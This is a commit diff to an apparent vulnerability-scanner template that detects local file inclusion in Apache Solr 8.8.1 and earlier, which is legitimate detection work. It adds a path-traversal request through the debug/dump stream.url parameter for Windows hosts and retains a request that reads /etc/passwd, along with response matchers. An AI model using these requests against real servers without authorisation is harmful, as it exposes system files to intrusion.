Update apache-solr-file-read.yaml

1. The added GET request triggers a file local read on Windows OS. 2. Matcher added to the Response trigger by 1. 3. Matcher for other cases (Errors, ie. not found path)
2022-12-01 18:51:21 -05:00 · 2022-12-01 18:51:21 -05:00 · 843264155b
parent 6242d0d126
commit 843264155b
1 changed files with 20 additions and 7 deletions
--- a/vulnerabilities/apache/apache-solr-file-read.yaml
+++ b/vulnerabilities/apache/apache-solr-file-read.yaml
@ -2,7 +2,7 @@ id: apache-solr-file-read

 info:
  name: Apache Solr <= 8.8.1 - Local File Inclusion
-  author: DhiyaneshDk
+  author: DhiyaneshDk, philippedelteil
  severity: high
  description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion.
  reference:
@ -22,6 +22,12 @@ requests:
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close
+        
+      - |
+        GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../&param=ContentStream HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Language: en
+        Connection: close

      - |
        GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1
@ -37,14 +43,21 @@ requests:
        regex:
          - '"name"\:"(.*?)"'

-    matchers-condition: and
    matchers:
-      - type: status
-        status:
-          - 200
-
+      - type: word
+        name: "Windows"
+        words:
+          - "Windows"
+          - "Users"
+          - "org.apache.solr.handler.DumpRequestHandler"
+        condition: and
      - type: regex
+        name: "Linux"
        regex:
          - "root:.*:0:0:"
-
+      - type: word
+        name: "Other"
+        words:
+          - "java.io.FileNotFoundException"
+  
 # Enhanced by mp on 2022/07/22